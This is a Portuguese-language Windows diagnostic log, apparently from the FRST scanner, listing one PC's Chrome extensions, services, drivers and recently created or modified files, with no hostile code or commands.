CHR Extension: (AirDroid) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\hkgndiocipalkpejnpafdbdlfdjihomd [2021-06-28]
CHR Extension: (Disconnect) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\jeoacafpbcihiomhlakheieifhpjdfeo [2021-06-28]
CHR Extension: (Social Video Downloader) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfnnoammpigcglgbhcbbdpnekbcddahe [2021-06-28]
CHR Extension: (Free VPN for Chrome - VPN Proxy VeePN) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\majdfhpaihoncoakbjgbdhglocklcgno [2022-08-21]
CHR Extension: (Dark Theme for Google Translate) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmcamjpjiefpjagnjmkedchjkmedadhc [2022-08-18]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-06-28]
CHR Extension: (DeviantArt Filter) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\odlmamilbohnpnoomjclomghphbajikp [2021-09-21]
CHR Extension: (WebP / Avif image converter) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbcfbdlbkdfobidmdoondbgdfpjolhci [2022-02-09]
CHR Extension: (Enhancer for YouTube™) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\ponfpcnoihfmfllpaingbgckeeldkhle [2022-08-04]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl]
CHR HKLM-x32\...\Chrome\Extension: [khndhdhbebhaddchcgnalcjlaekbbeof]

==================== Serviços (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

S2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\4.02.12\atkexComSvc.exe [457544 2022-02-10] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S2 asus; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [153112 2022-05-01] (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.)
S2 AsusCertService; C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe [181576 2022-02-18] (ASUSTeK Computer Inc. -> ASUSTek COMPUTER INC.)
S3 asusm; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [153112 2022-05-01] (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.)
S2 AsusROGLSLService; C:\Program Files (x86)\ASUS\AsusROGLSLService\AsusROGLSLService.exe [650208 2022-05-01] (ASUSTeK COMPUTER INC. -> ASUS)
S2 AsusUpdateCheck; C:\WINDOWS\System32\AsusUpdateCheck.exe [845256 2022-08-21] (ASUSTeK Computer Inc. -> )
R2 BDAuxSrv; C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe [821312 2022-07-12] (Bitdefender SRL -> Bitdefender)
R2 BDProtSrv; C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe [821312 2022-07-12] (Bitdefender SRL -> Bitdefender)
R2 bdredline; C:\Program Files\Common Files\Bitdefender\SetupInformation\Bitdefender RedLine\bdredline.exe [2161256 2018-03-22] (Bitdefender SRL -> Bitdefender)
R2 bdredline_agent; C:\Program Files\Bitdefender Agent\redline\bdredline.exe [2454632 2022-02-10] (Bitdefender SRL -> Bitdefender)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-05-17] (BattlEye Innovations e.K. -> )
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811496 2022-07-02] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [584680 2022-08-19] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2022-07-02] (Epic Games Inc. -> Epic Games, Inc.)
R2 GameSDK Service; C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe [396520 2022-01-20] (ASUSTEK COMPUTER INCORPORATION -> ASUS Inc.)
S2 LightingService; C:\Program Files (x86)\LightingService\LightingService.exe [3835360 2022-03-10] (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2579272 2022-08-09] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3497808 2022-08-09] (Electronic Arts, Inc. -> Electronic Arts)
S2 Parsec; C:\Program Files\Parsec\pservice.exe [414456 2022-05-12] (Parsec Cloud, Inc. -> Parsec)
S2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [789072 2022-07-25] (Bitdefender SRL -> Bitdefender)
S3 ProtonVPN Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPNService.exe [116840 2021-12-20] (Proton Technologies AG -> )
S3 ProtonVPN Update Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.UpdateService.exe [65128 2021-12-20] (Proton Technologies AG -> )
S3 ProtonVPN WireGuard; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe [50792 2021-12-20] (Proton Technologies AG -> )
R2 ROG Live Service; C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe [6307560 2022-04-14] (ASUSTeK COMPUTER INC. -> ASUSTek COMPUTER INC.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6215960 2022-07-23] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [16241056 2022-07-13] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender Security\updatesrv.exe [280128 2022-08-08] (Bitdefender SRL -> Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe [821312 2022-07-12] (Bitdefender SRL -> Bitdefender)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\NisSrv.exe [2644776 2021-06-28] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe [136656 2021-06-28] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WirelessKB850NotificationService; C:\WINDOWS\system32\WirelessKB850NotificationService.exe [176624 2018-05-14] (Microsoft Corporation -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_47917a79b8c7fd22\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_47917a79b8c7fd22\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Drivers (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

S3 AcxHdAudio; C:\WINDOWS\System32\drivers\AcxHdAudio.sys [557056 2022-05-12] (Microsoft Corporation) [Arquivo não assinado]
R1 Asusgio2; C:\WINDOWS\system32\drivers\AsIO2.sys [34384 2022-02-10] (ASUSTeK Computer Inc. -> )
R1 Asusgio3; C:\WINDOWS\system32\drivers\AsIO3.sys [43168 2022-02-18] (ASUSTeK Computer Inc. -> )
R1 atc; C:\WINDOWS\System32\DRIVERS\atc.sys [4802976 2022-05-10] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender S.R.L. Bucharest, ROMANIA)
R2 BdDci; C:\WINDOWS\System32\DRIVERS\bddci.sys [800672 2021-12-15] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [22976 2020-12-18] (Microsoft Windows Early Launch Anti-malware Publisher -> Bitdefender)
R0 bdprivmon; C:\WINDOWS\System32\DRIVERS\bdprivmon.sys [33208 2022-03-02] (Microsoft Windows Hardware Compatibility Publisher -> © Bitdefender SRL)
S3 bduefiscan; C:\WINDOWS\system32\DRIVERS\bduefiscan.sys [55864 2021-12-10] (Bitdefender SRL -> Bitdefender)
R2 BlueStacksDrv_nxt; C:\Program Files\BlueStacks_nxt\BstkDrv_nxt.sys [321784 2022-05-25] (Bluestack Systems, Inc -> Bluestack System Inc.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [507904 2021-11-04] (Microsoft Corporation) [Arquivo não assinado]
S3 BTHMODEM; C:\WINDOWS\System32\drivers\bthmodem.sys [98304 2021-06-05] (Microsoft Corporation) [Arquivo não assinado]
R1 CTIAIO; C:\WINDOWS\system32\drivers\CtiAIo64.sys [31808 2022-05-01] (Microsoft Windows Hardware Compatibility Publisher -> Creative Technology Innovation Co., LTd.)
S3 dc3d; C:\WINDOWS\System32\drivers\dc3d.sys [47616 2011-05-18] (Hardware Group Test Cert -> Microsoft Corporation)
R3 DroidCam; C:\WINDOWS\System32\drivers\droidcam.sys [32240 2020-04-10] (Microsoft Windows Hardware Compatibility Publisher -> Dev47Apps)
R3 DroidCamVideo; C:\WINDOWS\System32\DriverStore\FileRepository\droidcamvideo.inf_amd64_47e18363cbf3dfe0\droidcamvideo.sys [33784 2021-04-09] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
R0 Gemma; C:\WINDOWS\System32\DRIVERS\gemma.sys [1262496 2022-06-05] (Microsoft Windows Hardware Compatibility Publisher -> BitDefender S.R.L. Bucharest, ROMANIA)
R3 iaLPSS2_GPIO2_ADL; C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_gpio2_adl.inf_amd64_e11257f05c0c2f89\iaLPSS2_GPIO2_ADL.sys [139928 2021-07-29] (Intel Corporation -> Intel Corporation)
R3 iaLPSS2_I2C_ADL; C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_i2c_adl.inf_amd64_778b19a5f4d49cba\iaLPSS2_I2C_ADL.sys [202896 2021-07-29] (Intel Corporation -> Intel Corporation)
R0 iaStorVD; C:\WINDOWS\System32\drivers\iaStorVD.sys [1587376 2021-10-19] (Intel Corporation -> Intel Corporation)
R2 Ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [185312 2020-10-07] (Bitdefender SRL -> Bitdefender)
R4 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [46728 2022-04-14] (ASUSTEK COMPUTER INC. -> ASUSTeK Computer Inc.)
S3 ksophon_x64; C:\WINDOWS\system32\drivers\ksophon_x64.sys [9966728 2022-08-13] (PROXIMA BETA PTE. LIMITED -> PROXIMA BETE)
R2 Ld9BoxSup; C:\Program Files\ldplayer9box\Ld9BoxSup.sys [376144 2022-08-19] (Shanghai Chang Zhi Network Technology Co,. Ltd. -> Oracle Corporation)
R1 MSIO; C:\WINDOWS\system32\drivers\MsIo64.sys [17424 2020-01-19] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-11-01] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
S3 ProtonVPNCallout; C:\Program Files (x86)\Proton Technologies\ProtonVPN\x64\Win10\ProtonVPN.CalloutDriver.sys [34176 2021-05-28] (Microsoft Windows Hardware Compatibility Publisher -> Proton Technologies AG)
S3 rtcx21; C:\WINDOWS\System32\DriverStore\FileRepository\rtcx21x64.inf_amd64_d2a498d51a4f7bec\rtcx21x64.sys [409000 2021-06-01] (Realtek Semiconductor Corp. -> Realtek)
R3 tapprotonvpn; C:\WINDOWS\System32\drivers\tapprotonvpn.sys [49024 2021-05-28] (Microsoft Windows Hardware Compatibility Publisher -> The OpenVPN Project)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [633264 2022-06-05] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
R1 ViGEmBus; C:\WINDOWS\System32\drivers\ViGEmBus.sys [165744 2020-12-14] (Microsoft Windows Hardware Compatibility Publisher -> Nefarius Software Solutions e.U.)
R0 vlflt; C:\WINDOWS\System32\DRIVERS\vlflt.sys [474048 2022-05-10] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [49568 2021-06-28] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [425184 2021-06-28] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [76000 2021-06-28] (Microsoft Windows -> Microsoft Corporation)
S3 wintun; C:\WINDOWS\System32\drivers\wintun.sys [29680 2022-02-02] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC)
S3 WirelessKeyboardFilter; C:\WINDOWS\System32\drivers\WirelessKeyboardFilter.sys [49336 2018-03-11] (Microsoft Corporation -> Microsoft Corporation)
R3 WOVAD; C:\WINDOWS\System32\drivers\womic.sys [51192 2022-01-14] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
S3 cpuz152; \??\C:\WINDOWS\temp\cpuz152\cpuz152_x64.sys [X]
S3 cpuz153; \??\C:\WINDOWS\temp\cpuz153\cpuz153_x64.sys [X]
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]

==================== NetSvcs (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)


==================== Um mês (criados) (Whitelisted) =========

(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

2022-08-21 19:20 - 2022-08-21 19:31 - 000039196 _____ C:\Users\trean\Desktop\FRST.txt
2022-08-21 19:19 - 2022-08-21 19:30 - 000000000 ____D C:\FRST
2022-08-21 19:16 - 2022-08-21 19:16 - 002371072 _____ (Farbar) C:\Users\trean\Desktop\FRST64.exe
2022-08-21 19:14 - 2022-08-21 19:14 - 008551608 _____ (Malwarebytes) C:\Users\trean\Desktop\adwcleaner.exe
2022-08-21 19:14 - 2022-08-21 19:14 - 000000000 ____D C:\AdwCleaner
2022-08-21 19:06 - 2022-08-21 19:09 - 000000000 ____D C:\Users\trean\Desktop\Ryujinx-MyTry
2022-08-21 19:06 - 2022-08-21 19:06 - 000000000 ____D C:\Users\trean\Desktop\9Cloud_377001_1
2022-08-21 18:07 - 2022-08-21 18:07 - 000292636 _____ C:\Users\trean\Documents\backup cccleaner.reg
2022-08-21 05:46 - 2022-08-21 18:45 - 000000000 ____D C:\Users\trean\Desktop\build
2022-08-19 02:54 - 2022-08-19 02:54 - 000000223 _____ C:\Users\trean\Desktop\MultiVersus.url
2022-08-18 04:45 - 2022-08-18 04:45 - 000001623 _____ C:\WINDOWS\system32\config\VSMIDK
2022-08-18 04:11 - 2022-08-18 04:11 - 000000000 ____D C:\Program Files (x86)\Intel
2022-08-17 00:00 - 2022-08-17 00:00 - 000000000 ____D C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Citra
2022-08-13 19:38 - 2022-08-13 19:38 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2022-08-13 02:59 - 2022-08-13 02:59 - 009966728 _____ (PROXIMA BETE) C:\WINDOWS\system32\Drivers\ksophon_x64.sys
2022-08-13 02:59 - 2022-08-13 02:59 - 000000000 ____D C:\Users\trean\AppData\Roaming\DSS
2022-08-13 02:49 - 2022-08-13 02:58 - 000000000 ____D C:\Users\trean\AppData\Local\Hotta
2022-08-13 02:48 - 2022-08-19 00:37 - 000000000 ____D C:\Users\trean\AppData\Roaming\tof_launcher
2022-08-13 02:48 - 2022-08-13 02:57 - 000001968 _____ C:\Users\Public\Desktop\Tower of Fantasy.lnk
2022-08-13 02:48 - 2022-08-13 02:48 - 000001080 _____ C:\Users\trean\AppData\Roaming\tof_launcher.reg
2022-08-13 02:48 - 2022-08-13 02:48 - 000000000 ____D C:\Users\trean\AppData\Local\RailCrashReport
2022-08-13 02:48 - 2022-08-13 02:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tower of Fantasy
2022-08-13 02:37 - 2022-08-13 02:37 - 000000000 ____D C:\Users\trean\AppData\Local\tofMiniLoader
2022-08-13 02:37 - 2022-08-13 02:37 - 000000000 ____D C:\ProgramData\intl_ua
2022-08-11 03:10 - 2022-08-16 15:12 - 000000000 ____D C:\Program Files\Mozilla Firefox
2022-08-10 15:36 - 2022-08-10 15:36 - 000015026 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-08-10 15:34 - 2022-08-10 15:34 - 000000000 ___HD C:\$WinREAgent
2022-08-10 15:32 - 2022-08-10 15:32 - 000000000 ____D C:\Users\Default\.dotnet
2022-08-09 18:16 - 2022-07-22 01:25 - 000043184 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvhdap64.dll
2022-08-09 18:15 - 2022-07-28 04:28 - 001905920 _____ C:\WINDOWS\system32\vulkaninfo-1-999-0-0-0.exe
2022-08-09 18:15 - 2022-07-28 04:28 - 001905920 _____ C:\WINDOWS\system32\vulkaninfo.exe
2022-08-09 18:15 - 2022-07-28 04:28 - 001478408 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2022-08-09 18:15 - 2022-07-28 04:28 - 001478408 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2022-08-09 18:15 - 2022-07-28 04:27 - 001471992 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2022-08-09 18:15 - 2022-07-28 04:27 - 001432320 _____ C:\WINDOWS\system32\vulkan-1-999-0-0-0.dll
2022-08-09 18:15 - 2022-07-28 04:27 - 001432320 _____ C:\WINDOWS\system32\vulkan-1.dll
2022-08-09 18:15 - 2022-07-28 04:27 - 001213432 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2022-08-09 18:15 - 2022-07-28 04:27 - 001145600 _____ C:\WINDOWS\SysWOW64\vulkan-1-999-0-0-0.dll
2022-08-09 18:15 - 2022-07-28 04:27 - 001145600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2022-08-09 18:15 - 2022-07-28 04:24 - 000865776 _____ C:\WINDOWS\system32\nvofapi64.dll
2022-08-09 18:15 - 2022-07-28 04:24 - 000771576 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvml.dll
2022-08-09 18:15 - 2022-07-28 04:24 - 000687608 _____ C:\WINDOWS\SysWOW64\nvofapi.dll
2022-08-09 18:15 - 2022-07-28 04:23 - 002127872 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2022-08-09 18:15 - 2022-07-28 04:23 - 001607680 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2022-08-09 18:15 - 2022-07-28 04:23 - 001536504 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2022-08-09 18:15 - 2022-07-28 04:23 - 001182712 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2022-08-09 18:15 - 2022-07-28 04:23 - 000714752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvidia-smi.exe
2022-08-09 18:15 - 2022-07-28 04:22 - 010269688 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2022-08-09 18:15 - 2022-07-28 04:22 - 008803832 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2022-08-09 18:15 - 2022-07-28 04:22 - 005362672 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2022-08-09 18:15 - 2022-07-28 04:22 - 003066872 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2022-08-09 18:15 - 2022-07-28 04:22 - 001059328 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2022-08-09 18:15 - 2022-07-28 04:22 - 000845296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2022-08-09 18:15 - 2022-07-28 04:22 - 000456176 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdebugdump.exe
2022-08-09 18:15 - 2022-07-28 04:21 - 005735920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2022-08-09 18:15 - 2022-07-28 04:21 - 000852976 _____ (NVIDIA Corporation) C:\WINDOWS\system32\MCU.exe
2022-08-09 18:15 - 2022-07-22 01:25 - 000093241 _____ C:\WINDOWS\system32\nvinfo.pb
2022-08-09 05:24 - 2022-08-09 05:24 - 000099204 _____ C:\ProgramData\agent.update.1660033453.bdinstall.v2.bin
2022-08-08 05:39 - 2022-08-08 05:39 - 045282638 _____ C:\Users\trean\Desktop\Street Fighter 6 - Kimberly and Juri Gameplay Trailer.mp4
2022-08-08 00:46 - 2022-08-08 00:49 - 000000000 ____D C:\Users\trean\Desktop\espaço
2022-08-07 22:54 - 2022-08-07 22:54 - 000001826 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OBS Studio.lnk
2022-08-07 22:53 - 2022-08-07 22:54 - 000001568 _____ C:\Users\trean\Desktop\OBS Studio.lnk
2022-08-07 22:49 - 2022-08-07 22:49 - 000000000 ____D C:\Users\trean\Desktop\OBS-Studio-28.0-beta1-Full-x64
2022-08-06 04:32 - 2022-08-08 20:56 - 000000000 ____D C:\Users\trean\Desktop\EnslaverDarkPath-0.2.5-pc
2022-08-04 04:43 - 2022-08-04 04:44 - 000000000 ____D C:\Users\trean\Desktop\Monster
2022-08-03 13:05 - 2022-08-15 04:12 - 000000787 _____ C:\Users\trean\Desktop\LDPlayer9.lnk
2022-08-03 08:27 - 2022-08-03 08:27 - 001137565 _____ C:\Users\trean\Desktop\cry and eat.mp4
2022-08-02 01:34 - 2022-08-21 05:48 - 000000000 ____D C:\Users\trean\.Ld9VirtualBox
2022-08-02 01:34 - 2022-08-19 06:40 - 000000000 ____D C:\Program Files\ldplayer9box
2022-08-02 01:34 - 2022-08-15 04:12 - 000000836 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\LDMultiPlayer9.lnk
2022-08-02 01:34 - 2022-08-15 04:12 - 000000811 _____ C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\LDPlayer9.lnk
2022-08-02 01:34 - 2022-08-02 01:34 - 000000000 ____D C:\Users\trean\Documents\XuanZhi9
2022-08-02 01:34 - 2022-08-02 01:34 - 000000000 ____D C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LDPlayer9
2022-08-02 01:33 - 2022-08-19 06:40 - 000000000 ____D C:\Users\trean\AppData\Roaming\XuanZhi9
2022-07-31 20:40 - 2022-07-31 20:40 - 000000218 _____ C:\Users\trean\AppData\Local\recently-used.xbel
2022-07-25 07:54 - 2022-07-30 08:20 - 000000000 ____D C:\Users\trean\Documents\GitHub
2022-07-25 07:52 - 2022-08-21 19:14 - 000000000 ____D C:\Users\trean\AppData\Roaming\GitHub Desktop
2022-07-25 07:52 - 2022-07-25 07:52 - 000002367 _____ C:\Users\trean\Desktop\GitHub Desktop.lnk
2022-07-25 07:52 - 2022-07-25 07:52 - 000000178 _____ C:\Users\trean\.gitconfig
2022-07-25 07:52 - 2022-07-25 07:52 - 000000000 ____D C:\Users\trean\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GitHub, Inc
2022-07-25 07:52 - 2022-07-25 07:52 - 000000000 ____D C:\Users\trean\AppData\Local\GitHubDesktop
2022-07-25 07:51 - 2022-07-25 07:51 - 049381480 _____ (The Git Development Community ) C:\Users\trean\Desktop\Git-2.37.1-64-bit.exe
2022-07-23 04:41 - 2022-07-23 04:41 - 000335872 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll
2022-07-23 04:41 - 2022-07-23 04:41 - 000327680 _____ C:\WINDOWS\system32\pnpdiag.dll
2022-07-23 04:41 - 2022-07-23 04:41 - 000069632 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2022-07-23 04:41 - 2022-07-23 04:41 - 000041472 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2022-07-23 00:37 - 2022-07-23 00:42 - 000000000 ____D C:\Users\trean\AppData\LocalLow\CAPCOM
2022-07-23 00:21 - 2022-07-23 00:22 - 000000000 ____D C:\Users\trean\Desktop\EmuSAK-win32-x64-2.1.9-portable

==================== Um mês (modificados) ==================

(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

2022-08-21 19:18 - 2021-06-28 06:52 - 000000000 ____D C:\ProgramData\NVIDIA
2022-08-21 19:14 - 2021-06-28 06:47 - 000000000 ____D C:\Users\trean\AppData\Roaming\discord
2022-08-21 19:14 - 2021-06-05 09:10 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-08-21 19:10 - 2021-06-28 06:45 - 000000000 ____D C:\Program Files (x86)\Steam
2022-08-21 19:09 - 2021-06-28 06:46 - 000000000 ____D C:\Users\trean\AppData\Local\Discord
2022-08-21 19:03 - 2021-06-28 06:45 - 000000000 ____D C:\Program Files (x86)\Google
2022-08-21 19:01 - 2021-07-01 19:33 - 000000000 ____D C:\Users\trean\AppData\Local\CrashDumps
2022-08-21 19:01 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\SystemTemp
2022-08-21 18:53 - 2022-05-07 12:55 - 000004784 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeShadowStackRollbackTask
2022-08-21 18:53 - 2021-06-28 06:35 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-08-21 18:53 - 2021-06-05 09:10 - 000000000 ___HD C:\Program Files\WindowsApps
2022-08-21 18:53 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-08-21 18:45 - 2021-06-29 11:03 - 000000000 ____D C:\Users\trean\AppData\Roaming\MPC-HC
2022-08-21 18:30 - 2021-06-29 20:23 - 000000000 ____D C:\Users\trean\Downloads\Telegram Desktop
2022-08-21 18:16 - 2022-03-09 15:39 - 001769330 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-08-21 18:16 - 2021-06-05 14:55 - 000766494 _____ C:\WINDOWS\system32\prfh0416.dat
2022-08-21 18:16 - 2021-06-05 14:55 - 000153688 _____ C:\WINDOWS\system32\prfc0416.dat
2022-08-21 18:16 - 2021-06-05 09:09 - 000000000 ____D C:\WINDOWS\INF
2022-08-21 18:09 - 2022-05-01 06:41 - 000901328 _____ () C:\WINDOWS\system32\wpbbin.exe
2022-08-21 18:09 - 2022-05-01 06:41 - 000845256 _____ C:\WINDOWS\system32\AsusUpdateCheck.exe
2022-08-21 18:09 - 2022-04-01 16:03 - 000000000 ____D C:\Users\trean\.elevenclock
2022-08-21 18:09 - 2022-03-09 15:39 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-08-21 18:09 - 2021-07-09 18:34 - 000000000 ____D C:\Users\trean\AppData\Roaming\WTablet
2022-08-21 18:09 - 2021-07-09 04:18 - 000000000 ____D C:\Program Files\TeamViewer
2022-08-21 18:09 - 2021-06-28 06:35 - 000012288 ___SH C:\DumpStack.log.tmp
2022-08-21 18:09 - 2021-06-28 05:32 - 000000000 ____D C:\Intel
2022-08-21 18:09 - 2021-06-05 09:01 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2022-08-21 18:06 - 2022-06-30 01:39 - 000000000 ____D C:\WINDOWS\SysWOW64\directx
2022-08-21 18:06 - 2021-07-10 23:05 - 000001155 _____ C:\Users\trean\Desktop\MSI Afterburner.lnk
2022-08-21 18:06 - 2021-07-10 23:05 - 000000000 ____D C:\Program Files (x86)\RivaTuner Statistics Server
2022-08-21 18:06 - 2021-07-09 04:18 - 000000000 ____D C:\Users\trean\AppData\Roaming\TeamViewer
2022-08-21 18:05 - 2021-06-05 09:10 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2022-08-21 17:55 - 2021-10-10 18:24 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2022-08-21 17:14 - 2022-03-09 15:35 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-08-21 00:19 - 2022-02-15 03:20 - 000000000 ____D C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
2022-08-21 00:18 - 2021-06-28 07:23 - 000000000 ____D C:\Users\trean\AppData\LocalLow\Mozilla
2022-08-20 04:05 - 2021-06-28 06:45 - 000002245 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-08-19 06:40 - 2021-06-05 09:01 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-08-19 05:51 - 2022-03-09 14:56 - 000000000 ____D C:\Program Files\MSBuild
2022-08-19 05:51 - 2022-03-09 14:56 - 000000000 ____D C:\Program Files (x86)\MSBuild
2022-08-19 03:00 - 2021-11-29 05:28 - 000000000 ____D C:\Users\trean\Desktop\DS4Windows
